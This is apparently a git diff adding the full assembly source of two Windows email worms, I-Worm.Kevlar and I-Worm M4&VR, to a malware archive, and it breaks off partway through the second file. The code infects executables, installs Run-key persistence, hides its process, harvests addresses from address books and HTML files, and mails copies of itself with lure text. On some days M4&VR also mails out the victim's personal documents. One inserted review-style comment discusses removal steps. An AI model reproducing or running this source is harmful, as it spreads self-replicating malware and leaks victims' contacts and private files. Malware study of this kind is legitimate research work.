+VB_F: pushad + push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + @pushsz "C:\__.vbs" + callx CreateFileA + test eax,eax + xchg edi,eax + push 00h + push offset octets + push VBSSIZE + push offset vbsd + push edi + callx WriteFile + push edi + callx CloseHandle + popad + push 1 + @pushsz "wscript C:\__.vbs" + callx WinExec + push 10000 + callx Sleep + @pushsz "C:\__.vbs" + callx DeleteFileA + +SCAN1: mov edi,offset addbook + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,"ddA\" + stosd + mov eax,"kooB" + stosd + mov eax,"txt." 
+ stosd + xor eax,eax + stosd + call OPEN + +FIN: push 00h + callx ExitProcess + + Nick Proc + mov edi,offset nickname + callx GetTickCount + push 9 + pop ecx + xor edx,edx + div ecx + inc edx + mov ecx,edx + name_g: + push ecx + callx GetTickCount + push 'Z'-'A' + pop ecx + xor edx,edx + div ecx + xchg eax,edx + add al,'A' + stosb + callx GetTickCount + push 100 + pop ecx + xor edx,edx + div ecx + push edx + callx Sleep + pop ecx + loop name_g + ret + Nick EndP + + Infect Proc + pushad + push 50 + push offset WinPath + callx GetWindowsDirectoryA + push offset WinPath + callx SetCurrentDirectoryA + FFF: + push offset Search + @pushsz "C???????.exe" + callx FindFirstFileA + inc eax + je F_INF + dec eax + mov [exeHdl],eax + I_FILE: + mov verif,0 + xor eax,eax + push eax + push eax + push 03h + push eax + push eax + push 80000000h or 40000000h + push offset Search.cFileName + callx CreateFileA + inc eax + jz FNF + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 04h + push eax + push ebx + callx CreateFileMappingA + test eax,eax + jz CL1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 06h + push ebp + callx MapViewOfFile + test eax,eax + jz CL2 + xchg eax,edi + + mov esi,eax + cmp word ptr [esi],"ZM" + jne CL2 + cmp byte ptr [esi+18h],"@" + jne CL2 + cmp word ptr [esi+80h],"EP" + jne CL2 + cmp byte ptr [esi+12h],"P" + je CL2 + mov word ptr [esi+12h],"eP" + mov word ptr [esi+14h],"it" + mov byte ptr [esi+16h],"K" + inc verif + push edi + callx UnmapViewOfFile + CL2: + push ebp + callx CloseHandle + CL1: + push ebx + callx CloseHandle + + cmp verif,1 + jne FNF + mov edi,offset InfoFile + push edi + push 50 + push edi + callx GetWindowsDirectoryA + add edi,eax + mov eax,'iSM\' + stosd + mov eax,'3ofn' + stosd + mov eax,'xt.2' + stosd + mov al,'t' + stosb + pop edi + mov esi,edi + push esi + @pushsz "Infected by W32.Kevlar.PetiK" + push offset Search.cFileName + @pushsz "File Infected" + callx WritePrivateProfileStringA 
+ + FNF: + push offset Search + push [exeHdl] + callx FindNextFileA + test eax,eax + jne I_FILE + FC: + push [exeHdl] + callx FindClose + F_INF: + popad + ret + Infect EndP + + Infect2 Proc + pushad + push 50 + push offset WinPath + callx GetWindowsDirectoryA + push offset WinPath + callx SetCurrentDirectoryA + FFF2: + push offset Search + @pushsz "*.exe" + callx FindFirstFileA + inc eax + je F_INF2 + dec eax + mov [exeHdl],eax + I_FILE2: + pushad + mov edi,offset Search.cFileName + push edi + callx lstrlen + add edi,eax + mov eax,"mth." + stosd + xor eax,eax + stosd + push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + push offset Search.cFileName + callx CreateFileA + test eax,eax + xchg ebp,eax + push 00h + push offset octets + push HTMSIZE + push offset htmd + push ebp + callx WriteFile + push ebp + callx CloseHandle + popad + FNF2: + push offset Search + push [exeHdl] + callx FindNextFileA + test eax,eax + jne I_FILE2 + FC2: + push [exeHdl] + callx FindClose + F_INF2: + popad + ret + Infect2 EndP + +OPEN: pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + push offset addbook + callx CreateFileA + inc eax + je NO + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 02h + push eax + push ebx + callx CreateFileMappingA + test eax,eax + je F1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 04h + push ebp + callx MapViewOfFile + test eax,eax + je F2 + xchg eax,esi + + push 00h + push ebx + callx GetFileSize + cmp eax,03h + jbe F3 ; is the file empty ?? + + call SCAN + +F3: push esi + callx UnmapViewOfFile +F2: push ebp + callx CloseHandle +F1: push ebx + callx CloseHandle +NO: popad + ret + + SCAN: + pushad + xor edx,edx + mov edi,offset m_addr + push edi + p_c: lodsb + cmp al," " + je car_s + cmp al,0dh + je entr1 + cmp al,0ah + je entr2 + cmp al,"!" 
+ je f_mail + cmp al,"@" + je not_a + inc edx + not_a: stosb + jmp p_c + car_s: inc esi + jmp p_c + entr1: xor al,al + stosb + pop edi + test edx,edx + je SCAN + call SEND_MAIL + jmp SCAN + entr2: xor al,al + stosb + pop edi + jmp SCAN + f_mail: popad + ret + + SEND_MAIL: + push 50 + push offset save_addr + callx GetWindowsDirectoryA + @pushsz "\MSinfo32.txt" + push offset save_addr + callx lstrcat + push offset save_addr + @pushsz "Next victim" + push offset m_addr + @pushsz "EMail saved" + callx WritePrivateProfileStringA + xor eax,eax + push eax + push eax + push offset Message + push eax + push [MAPIHdl] + callx MAPISendMail + ret + + + +.data +; ===== INSTALLATION ===== +Orig db 50 dup (0) +CopyName db 50 dup (0) +CopyName2 db 50 dup (0) +nickname db 11 dup (?) + +; ===== INFECTION ===== +InfoFile db 50 dup (0) +WinPath db 50 dup (0) +exeHdl dd ? +verif dd ? +octets dd ? + +; ===== MAIL ===== +addbook db 50 dup (0) +save_addr db 50 dup (0) +m_addr db 128 dup (?) +MAPIHdl dd 0 +subject db "Windows Protect !!",00h +body db "The smallest software to stop your computer to bug in each time.",0dh,0ah + db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah + db "Take a look at the attchment.",0dh,0ah,0dh,0ah + db 09h,09h,"Bye and have a nice day.",00h +NameFrom db "Your friend",00h + + +Message dd ? + dd offset subject + dd offset body + dd ? + dd ? + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset Attach + +MsgFrom dd ? + dd ? + dd NameFrom + dd ? + dd ? + dd ? + +MsgTo dd ? + dd 1 + dd offset m_addr + dd offset m_addr + dd ? + dd ? + +Attach dd ? + dd ? + dd ? + dd offset CopyName2 + dd ? + dd ? 
+ + + +htmd: +db 'PetiKVX come back',0dh,0ah +db '',00h +HTMSIZE = $-htmd + +vbsd: +db 'On Error Resume Next',0dh,0ah +db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah +db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah +db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah +db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah +db 'c.Close',0dh,0ah +db 'For Each M In L.AddressLists',0dh,0ah +db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah +db 'For O = 1 To M.AddressEntries.Count',0dh,0ah +db 'Set P = M.AddressEntries(O)',0dh,0ah +db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah +db 'c.WriteLine P.Address',0dh,0ah +db 'c.Close',0dh,0ah +db 'Next',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah +db 'c.WriteLine "!"',0dh,0ah +db 'c.Close',0dh,0ah +VBSSIZE = $-vbsd + +signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h + + +MAX_PATH equ 260 +FILETIME struct +dwLowDateTime dd ? +dwHighDateTime dd ? +FILETIME ends +WIN32_FIND_DATA struct +dwFileAttributes dd ? +ftCreationTime FILETIME ? +ftLastAccessTime FILETIME ? +ftLastWriteTime FILETIME ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved0 dd ? +dwReserved1 dd ? +cFileName dd MAX_PATH (?) +cAlternateFileName db 13 dup (?) + db 3 dup (?) +WIN32_FIND_DATA ends + +Search WIN32_FIND_DATA <> + + +end DEBUT +end \ No newline at end of file diff --git a/Win32/I-Worm.M4&VR.asm b/Win32/I-Worm.M4&VR.asm new file mode 100644 index 00000000..803a8818 --- /dev/null +++ b/Win32/I-Worm.M4&VR.asm 
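Review bot: The header's "To delete the worm" recipe does not match the code beneath it: the REG block writes the Run value `Kevlar32` under HKLM `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` via SHSetValueA, which none of the `del` lines remove, and both copies are placed in the directory returned by GetSystemDirectoryA, which on NT-family Windows is system32 rather than the hard-coded `%windir%\system`. Suggest adding `reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Kevlar32 /f` and a note that the copy location follows GetSystemDirectoryA. The recipe should also say that the `C???????.exe` files touched by Infect keep the "PetiK" marker written into the DOS header at offsets 12h–16h (fields the PE loader presumably ignores, which is why the files still run), so deletion alone leaves those marked files — enumerated in MSinfo32.txt under `[File Infected]` — as residual artifacts.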
@@ -0,0 +1,2048 @@ +;----------------------------------------------------------------------------- +;------------------------------- ----------------------------------------- +;----------------------------- --------------------------------------- +;--------------------------- I-Worm M4&VR ------------------------------------ +;----------------------------- --------------------------------------- +;------------------------------- ----------------------------------------- +;----------------------------------------------------------------------------- + +.386p +.model flat + +;--------------------------- Include Zone ------------------------------------ + +MEM_COMMIT equ 00001000h +MEM_RESERVE equ 00002000h +PAGE_READWRITE equ 00000004h +PAGE_READONLY equ 00000002h +FILE_ATTRIBUTE_NORMAL equ 080h +OPEN_EXISTING equ 03h +FILE_SHARE_READ equ 01h +GENERIC_READ equ 80000000h +FILE_MAP_WRITE equ 00000002h +FILE_MAP_READ equ 00000004h +CREATE_ALWAYS equ 2 +GENERIC_WRITE equ 40000000h + +;-------------------------- Macro Zone --------------------------------------- + +@INIT_SehFrame macro Instruction + local OurSeh + call OurSeh + mov esp,[esp+08h] + Instruction +OurSeh: + xor edx,edx + push dword ptr fs:[edx] + mov dword ptr fs:[edx],esp + endm + +@REM_SehFrame macro + xor edx,edx + pop dword ptr fs:[edx] + pop edx + endm + +@pushsz macro string + local Str + call Str + db string,0 +Str: endm + +api macro a + extrn a:PROC + call a + endm + +;------------------------ Constantes Zone ------------------------------------ + +SEH equ 1 ; SEH protection + +NbEmailWanted equ 150 ; Nb Email to Seek >1 +EmailSize equ 64 ; Attention rol eax,6 (2^6) +EmailFileSize equ (EmailSize*(NbEmailWanted+1)) ; For VirtualAlloc (+Security) +NbToSend equ 20 ; Send x emails per session + +NbPersoWanted equ 20 ; Nb Personal document to Seek +PersoSize equ 256 ; Attention rol eax,8 (2^8) +PersoFileSize equ (PersoSize*(NbPersoWanted+1)) ; For VirtualAlloc (+Security) + +MimeHeaderSize equ 1024 ; Mime 
Header size + +;----------------------------------------------------------------------------- +;--------------------------- Code Zone --------------------------------------- +;----------------------------------------------------------------------------- + +.code + +Mv: + pushad + + IF SEH + @INIT_SehFrame ; Init SEH + ENDIF + +;------------------------- Check & Mark Presency ----------------------------- + +TryToOpenOurMutex: + xor eax, eax + @pushsz 'MvMutex' ; Mutex Name + push eax + push eax + api OpenMutexA ; already in mem + or eax,eax + jnz ExitMv ; Yes, do nothing more + +CreateOurMutex: + xor eax, eax + @pushsz 'MvMutex' ; Mutex Name + push eax ; No owner + push eax ; default security attrib + api CreateMutexA ; create Our Mutex + mov dword ptr[MutexHdl], eax + +;---------------------------- Random Init ------------------------------------ + +RandomInit: + api GetTickCount + mov RandomNb, eax + +;---------------------- Hide Process on Win9x -------------------------------- + +HideProcess: + @pushsz "KERNEL32.dll" + api GetModuleHandleA + @pushsz "RegisterServiceProcess" ; Error on NT + push eax + api GetProcAddress + test eax, eax + jz GetOurPathName + push 01h + push 00h + call eax + +;----------------------- Copy Worm in Sys Dir -------------------------------- + +GetOurPathName: + xor eax, eax + push eax + api GetModuleHandleA ; Our Handle + push 260 + push offset MyPath + push eax + api GetModuleFileNameA ; Our Path + +CreateDestPath: + push 260 + push offset TempPath&Name + api GetSystemDirectoryA ; System Dir + + @pushsz '\NETAV.EXE' + push offset TempPath&Name + api lstrcat ; Path+Name of File to Create + +CheckHowExecuted: + push offset MyPath + push offset TempPath&Name + api lstrcmp + test eax, eax + jz AutoRun + +CreateOurFile: + xor eax, eax + push eax ; Overwrite mode set + push offset TempPath&Name + push offset MyPath + api CopyFileA ; Copy Worm in Sys Dir + + +;------------------------- Registry Worm ------------------------------------- + 
+RegWorm: + push offset TempPath&Name + api lstrlen + push eax + push offset TempPath&Name + push 1 + @pushsz "NETAV Agent" + @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + api SHSetValueA + +;-------------------- First Launch Fake Message ------------------------------ + +FakeMessage: + push 1040 + @pushsz 'Setup' + @pushsz 'This file does not work on this system' + push 0 + api MessageBoxA + +;---------------------- Check Email File & Create ---------------------------- +AutoRun: + +CheckEmailFile: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + api GetSystemDirectoryA ; System Dir + + push offset TempPath&Name + api SetCurrentDirectoryA ; Set sys dir + + push offset search ; Push it + @pushsz 'ICMAIL.DLL' ; Mask + api FindFirstFileA ; find file + inc eax + jnz UpDateEmailList ; The File Exist + + call CreateEmailFile ; Create It if Does not exist + +;----------------------- Check if Update Time -------------------------------- + +UpDateEmailList: + lea esi,SystemTimeData + push esi + api GetSystemTime + + movzx edx, word ptr[esi+4] ; Esi point day of week + cmp edx, 4 ; Jeudi ? 
+ jne Check_if_Connected ; No + + call CreateEmailFile ; Yes, Update Email File + +;-------------------------- Spread the Worm ---------------------------------- + +Check_if_Connected: + push offset SystemTimeData + api GetSystemTime + + push 0 + push offset IConnectedStateTemp + api InternetGetConnectedState + dec eax + jnz No_internet ; No connection + + call SendEmail ; Send Wab Emails + Rnd Email + jmp ExitMvMutex ; Then Bye + +No_internet: + push 5*60*1000 ; 5 min + api Sleep + jmp Check_if_Connected + +;----------------------------- The End --------------------------------------- + +ExitMvMutex: + push dword ptr[MutexHdl] + api CloseHandle + +ExitMv: + call FreeTheMem + + IF SEH + @REM_SehFrame ; Restore SEH + ENDIF + + popad + + push 0 + api ExitProcess ; Quit + + + db '---iworm.mv4&vr.by.tony/mvcrew---',0dh,0dh + + +;----------------------------------------------------------------------------- +;----------------------------------------------------------------------------- +;------------------------- Sub Routine Zone ---------------------------------- +;----------------------------------------------------------------------------- +;----------------------------------------------------------------------------- + + +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: +;........................ Major Sub Routine .................................. +;............................ Z O N E ........................................ +;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: + + +;...................... Create The Email File ................................ +;............................................................................. 
+ +; OUT : Email File in System Dir : ICMAIL.DLL + +CreateEmailFile: + mov dword ptr[NbEmailFound], 0 + +ReserveMem_For_EmailListe: + xor eax,eax + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push EmailFileSize + push eax ; System decide where + api VirtualAlloc + or eax,eax + jz EmailFileError ; Alloc Fail + mov dword ptr[EmailList], eax + +EmailSeeker: + call SearchWabFile_Email ; Search Email address book + call SearchHtmFile_Email ; Search Email HTML + +CreateTheEmailFile: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + api GetSystemDirectoryA ; System Dir + @pushsz '\ICMAIL.DLL' + push offset TempPath&Name + api lstrcat ; Path+Name of File to Create + xor eax,eax + push eax + push eax + push CREATE_ALWAYS + push eax + push FILE_SHARE_READ + push GENERIC_WRITE + push offset TempPath&Name + api CreateFileA + inc eax + jz EmailFileError + dec eax + mov [TempFileHandle], eax + + push 0 + push offset ByteWritten + push EmailFileSize ; Copy Listes d'Emails + push dword ptr [EmailList] + push [TempFileHandle] + api WriteFile + + push dword ptr [TempFileHandle] + api CloseHandle + +EmailFileError: + ret + + +;........................ Find Email in HTML ................................. +;............................................................................. + +; Recursive Search from Internet Path for Email in Html + +SearchHtmFile_Email: + call Clear_TempPath&Name + + push 00h + push 20h ; Internet Path + push offset TempPath&Name + push 00h + api SHGetSpecialFolderPathA + + push offset TempPath&Name + api SetCurrentDirectoryA ; Selected dir = Internet Path + + lea eax, SeekHtmlCurrentDir + mov dword ptr[RoutineToCall], eax + call AllSubDirSearch ; Action = SeekHtmlCurrentDir + ret + +;.............. Seek Html in Current Dir + +; IN: Selected Current dir +; OUT: Emails in reserved Mem + +SeekHtmlCurrentDir: + cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND ! + je HtmlEmailSearchEnd ; YES... 
+ + lea edi, search + push edi + @pushsz '*.*htm*' + api FindFirstFileA + inc eax + jne SeekEmail_Html + ret + +SeekEmail_Html: + dec eax + xchg eax,esi + +SeekEmail_Html_Loop: + + call SeekEmail_In_ThisHtml ; Parse Html 4 emails + + cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND ! + je HtmlEmailSearchFin ; YES... + + push edi + push esi + api FindNextFileA + dec eax + je SeekEmail_Html_Loop + +HtmlEmailSearchFin: + push esi + api FindClose +HtmlEmailSearchEnd: + ret + +;.............. Parse Html for emails + +SeekEmail_In_ThisHtml: + pushad + push 0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push 0 + push FILE_SHARE_READ + push GENERIC_READ + lea eax, [search.FileName] + push eax + api CreateFileA + inc eax + je HtmlEmailSearchEnd ; Only ret for the call + dec eax ; Not the total end + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push PAGE_READONLY + push eax + push ebx + api CreateFileMappingA + test eax,eax + je CloseHtmlHandle + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push FILE_MAP_READ + push ebp + api MapViewOfFile + test eax,eax + je CloseHtml_MapHandle + xchg eax,esi + mov [maphandlemail],esi + mov [esi_save],esi + + push 0 + push ebx + api GetFileSize + xchg eax,ecx + jecxz CloseHtml_MapViewHandle + inc ecx + jz CloseHtml_MapViewHandle ; GetFileSize Error ? 
+ dec ecx +FixBugOverflow: + sub ecx, 8 + cmp ecx, 0 + jl CloseHtml_MapViewHandle + +SeekMailToStr: + mov esi,[esi_save] + call MTStr + db 'mailto:' +MTStr: + pop edi + +ScanFor_MailTo: + pushad + push 7 + pop ecx + rep cmpsb ; search for "mailto:" + popad ; string + je MailToFound_CheckEmail ; check the mail address + inc esi + dec ecx + jnz ScanFor_MailTo + +CloseHtml_MapViewHandle: + push [maphandlemail] + api UnmapViewOfFile +CloseHtml_MapHandle: + push ebp + api CloseHandle +CloseHtmlHandle: + push ebx + api CloseHandle + popad + ret + +MailToFound_CheckEmail: + inc esi + mov [esi_save],esi + dec esi + + mov edi, dword ptr [EmailList] + mov edx, dword ptr [NbEmailFound] + rol edx, 6 ; 64 = email size stockage + add edi, edx ; goto next place + + mov [EmailCurrentPos], edi + + xor edx,edx + add esi,7 + push edi ; mail address + +NextChar: + lodsb + cmp al, ' ' + je SkipChar + + cmp al, '"' ; eMail End ? + je EndChar + cmp al, '?' ; eMail End ? + je EndChar + cmp al, '>' ; eMail End ? + je EndChar + cmp al, '<' ; eMail End ? + je EndChar + cmp al, ']' ; eMail End ? + je EndChar + cmp al, '''' ; eMail End ? + je EndChar + + cmp al, '@' ; Valid email ? + jne CopyChar + inc edx +CopyChar: + stosb + jmp NextChar +SkipChar: + inc esi + jmp NextChar +EndChar: + xor al,al + stosb + pop edi + test edx,edx ; if EDX=0, mail is not + je SeekMailToStr ; valid (no '@') + + cmp dword ptr [NbEmailFound], 0 + je NoEmailYet + + mov edi, [EmailCurrentPos] + mov eax, [edi] + sub edi, 64 + cmp eax, [edi] + je SeekMailToStr + +NoEmailYet: + inc dword ptr [NbEmailFound] + cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND ! + je CloseHtml_MapViewHandle ; YES... + + jmp SeekMailToStr ; get next email address + + +;........................ Find Email in WAB .................................. +;............................................................................. 
+ +SearchWabFile_Email: + call Clear_TempPath&Name + +GetWabPath: + mov dword ptr[KeySize], 260 ; Init Size to get + + push offset KeySize + push offset TempPath&Name + push offset Reg + push 0 + @pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" + push 80000001h + api SHGetValueA + test eax, eax + jne EndWab + +Open&Map_WabFile: + call Open&MapFile + jc EndWab + +WabSearchEmail: + mov ecx, [eax+64h] ; Nb of address + jecxz WabUnmapView ; No address + mov dword ptr[NbEmailFound], ecx ; For the Html search + mov [NbWabEmail],ecx ; For the emailfile +TruncFriend: + cmp ecx, NbEmailWanted ; Too many Friend + jbe NotManyFriend + mov ecx, NbEmailWanted ; To many @, reduce it + dec ecx ; for Html search (inc [NbEmailFound]!) + mov dword ptr[NbEmailFound], ecx ; For the Html search + mov [NbWabEmail],ecx ; For the emailfile +NotManyFriend: + mov esi, [eax+60h] ; email @ array + add esi, eax ; normalise + mov edi, dword ptr[EmailList] ; where store email + +GetWabEmailLoop: + call StockWabEmail + dec ecx + jnz GetWabEmailLoop + +WabUnmapView: + call Open&MapFileUnmapView + +EndWab: + ret + +StockWabEmail: + push ecx esi + push 40h + pop ecx + cmp byte ptr [esi+1],0 + jne StockWabEmailLoop + +StockWabEmailUnicodeLoop: + lodsw ; Unicode + stosb ; Ansi + dec ecx + test al, al + jne StockWabEmailUnicodeLoop + add edi, ecx ; next email field in Dest + pop esi ecx + add esi, 44h ; next email field in Wab + ret + +StockWabEmailLoop: + movsb ; Ansi + dec ecx + test al, al + jne StockWabEmailLoop + add edi, ecx ; next email field in Dest + pop esi ecx + add esi, 24h ; next email field in Wab + ret + +;..................... Send Email SMTP or MAPI ............................... +;............................................................................. 
+ +; OUT: Send via SMTP or MAPI #NbToSend Ramdom EmailAddress from EmailFile + + +SendEmail: + call MapEmailFile ; Map The Email File + jnc HowToSend + ret + +HowToSend: + mov byte ptr[SmtpFlag], 0 ; init flag to 0 + call GetUserSmtpServer ; Default Smtp Serveur Found ? + jc MapiSendVersion ; No + not byte ptr[SmtpFlag] ; flag = 1 + +MapiSendVersion: + not byte ptr[SmtpFlag] ; flag=0 if SMTP, flag=1 -> MAPI + +MapEmailFileOk: + lea esi, SystemTimeData + movzx ecx, word ptr[esi+4] ; Esi point day of week + cmp ecx, 2 ; Mardi + jne _NormalSend + mov byte ptr[PayloadFlag], 1 + call PersonalDocSearch ; Personal doc path in mem + +_NormalSend: + call NormalSendInit ; init attachement 4 Normal Send + + mov ebx, NbToSend ; Send NbToSend emails per session +SendRandomEmailLoop: + call SelectEmail ; return email ads in esi + jecxz SendBye ; EmailFile empty or NonExploitable + + lea edi, CurrentEmail ; <----------------- + mov ecx, EmailSize ; | + rep movsb ; Copy rnd Email in | + + xor al, al + sub esi, EmailSize + xchg edi, esi + mov ecx, EmailSize + rep stosb ; Remove email sent in EmailFile + +PaySendTime: + cmp byte ptr[PayloadFlag], 0 + je NormalSend + call PayloadSendInit ; Personals doc name in MyPath + +NormalSend: + call BuildMessageHeader ; build the mime header + + cmp byte ptr[SmtpFlag], 0 + jne MapiSendIt ; flag=1 -> MAPI + + call SmtpConnection + jc MapiSendIt ; smtp error -> mapi send + call SmtpSendCommand + jc MapiSendIt ; smtp error -> mapi send + call SmtpDisConnection + jmp SendNext ; If here No Mapi Needed + +MapiSendIt: + call MapiSend + +SendNext: + cmp byte ptr[PayloadFlag], 0 + je NormalSendNext + call ReleasePayMem +NormalSendNext: + call ClearHeaderMem + dec ebx + jnz SendRandomEmailLoop ; Send #NbToSend emails + +SendBye: + jmp Open&MapFileUnmapView ; Clean De-map EmailFile + + +;.............. 
Select Email to Send + +; OUT: esi point on the email +; ecx = 0 if error +; select first the email from the *.WAB + +SelectEmail: + mov ecx, NbEmailWanted + inc ecx +SelectIT: + dec ecx + jz SelectEmailError + + mov esi, dword ptr [mapaddress] ; emails from file in memory + + mov edi, NbEmailWanted ; Rnd Range + call GetRndNumber ; Rnd Nb in edx + + cmp dword ptr[NbWabEmail], 0 + je TriEMails + + dec dword ptr[NbWabEmail] + mov edx, dword ptr[NbWabEmail] + +TriEMails: + rol edx, 6 ; edx*emailsize (64) + add esi, edx ; esi on the email + + mov eax, dword ptr [esi] + test eax, eax ; No empty email + je SelectIT + mov eax, dword ptr [esi] + or eax, 20202020h ; Lower case + cmp eax, 'mbew' ; No webmaster@xxxxxxxx + je SelectIT + mov eax, dword ptr [esi] + or eax, 20202020h ; Lower case + cmp eax, 'ptth' ; No http:\\xxxxxxxxxxx + je SelectIT +SelectEmailError: + ret + +;.............. Normal Init The Attachement File + +; Routine appele tout le temps (Payload ou pas) -> Init du mess: header + body + +NormalSendInit: + +InitWhoSendName: + call ResMemHeader ; Some Mem for the mime header + + mov dword ptr[KeySize], 00000040h ; Init Size to get + + push offset KeySize + push offset mailfrom + push offset Reg + @pushsz "SMTP Email Address" ; User mail (for mail from:) + lea eax, AccountKey + push eax + push 80000001h + api SHGetValueA + test eax, eax + je InitWormName + mov byte ptr[UserEmailFoundFlag], 1 + +InitWormName: + xor al,al + mov ecx,260 + lea edi, MyPath + rep stosb + + push 260 + push offset MyPath + api GetSystemDirectoryA ; System Dir + + @pushsz '\NETAV.EXE' + push offset MyPath + api lstrcat ; Path+Name 4 Mapi Send&Smtp CodeB64File + +SmtpNormalSendInit: + call CodeB64File ; return worm file encoded in mem + + ret + +;.............. 
Build Message Header + +BuildMessageHeader: + push ebx ; for the loop + + cmp byte ptr[UserEmailFoundFlag], 0 + je BuildHeader + +CreateNameFrom: + xor al, al + lea edi, mailfrom + mov ecx, EmailSize + rep stosb + + push NbFromName ; nb name + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndFromNameTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Name offset + mov edi, [edi] + + push edi ; User mail not found -> fix another name + push offset mailfrom + api lstrcat + +CreateServFrom: + push NbFromServ ; nb serv + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndFromServTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Serv offset + mov edi, [edi] + + push edi ; User mail not found -> fix another name + push offset mailfrom + api lstrcat + +BuildHeader: + mov esi, dword ptr[MemMessageBody1] ; some mem + +BuildFrom: + @pushsz 'From: ' ; 
From: + push esi + api lstrcat + + push offset mailfrom ; user mail or another fixed + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + +BuildTo: + @pushsz 'To: ' ; To: + push esi + api lstrcat + + push offset CurrentEmail ; Email found in *.wab or Html + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + +BuildSubject: + @pushsz 'Subject: ' ; Subject: + push esi + api lstrcat + + push NbSubject ; nb Subject + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndSubjectTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Subject offset + mov edi, [edi] + + push edi ; Rnd Subject + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + +BuildBody: + push offset MessageBody1 ; Mime bordel jusqu'a -> email message + push esi + api lstrcat + +BuiltEmailMessage: + push NbRndText ; nb Text + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndTextTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Text offset + mov edi, [edi] + + push edi ; Rnd Text + push esi + api lstrcat + +BuildBody1b: + push offset MessageBody1b ; email message -> name= + push esi + api lstrcat + + cmp byte ptr[PayloadFlag],0 + jne BuildFileNamePay + +BuildFileNameNormal: + push NbRndFileName ; nb FileName + pop edi + call GetRndNumber ; edx = rnd nb + + lea edi, RndFileNameTb + rol edx, 2 ; table de dd + add edi, edx ; Point the right Text offset + mov edi, [edi] + + push edi ; Rnd File in name= + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + + push offset MessageBody1c ; .EXE",CRLF -> filename= + push esi + api lstrcat + + push edi ; Rnd File in filename= + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + @pushsz CRLF + push esi + api lstrcat + + jmp BuildSizeBody1 + +BuildFileNamePay: + call Clear_TempPath&Name + + push 260 + push offset TempPath&Name + push offset MyPath + api GetFileTitleA + + @pushsz '"' + push esi + api lstrcat + + push offset TempPath&Name + push esi + api 
lstrcat + + @pushsz '"' + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + + push offset MessageBody1c ; .EXE",CRLF -> filename= + push esi + api lstrcat + + @pushsz '"' + push esi + api lstrcat + + push offset TempPath&Name + push esi + api lstrcat + + @pushsz '"' + push esi + api lstrcat + + @pushsz CRLF + push esi + api lstrcat + @pushsz CRLF + push esi + api lstrcat + +BuildSizeBody1: + push esi + api lstrlen + + mov dword ptr[MessageSize1], eax ; Header+Mime bordel lenght for send cmd + +BuildMessageHeaderError: + pop ebx ; for the loop + ret + +;.............. Payload Init The Attachement File + +PayloadSendInit: + push ebx ; For The send Loop + + mov edi, dword ptr[NbPersonalFound] ; Rnd Range + call GetRndNumber ; Rnd Nb in edx + +PayMapiSendInit: + xor al,al + mov ecx,260 + lea edi, MyPath + rep stosb + + mov esi, dword ptr [PersoDocListe] + rol edx, 8 + add esi, edx ; esi = perso doc path + lea edi, MyPath + mov ecx, 256 ; Perso path size + rep movsb + +PaySmtpSendInit: + call CodeB64File ; return perso file encoded in mem + + pop ebx ; For The send Loop + ret + +;.............. Some Mem For The Mime Header + +ReleasePayMem: + push ebx + + mov ecx, dword ptr [MemEncoded] + call MemFreeIt + mov ecx, dword ptr [MemToEncode] + call MemFreeIt + + pop ebx + ret + +ClearHeaderMem: + xor al,al + mov ecx, MimeHeaderSize + mov edi, dword ptr[MemMessageBody1] + rep stosb + ret + +;.............. Some Mem For The Mime Header + +ResMemHeader: + xor eax,eax + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push MimeHeaderSize + push eax ; System decide where + 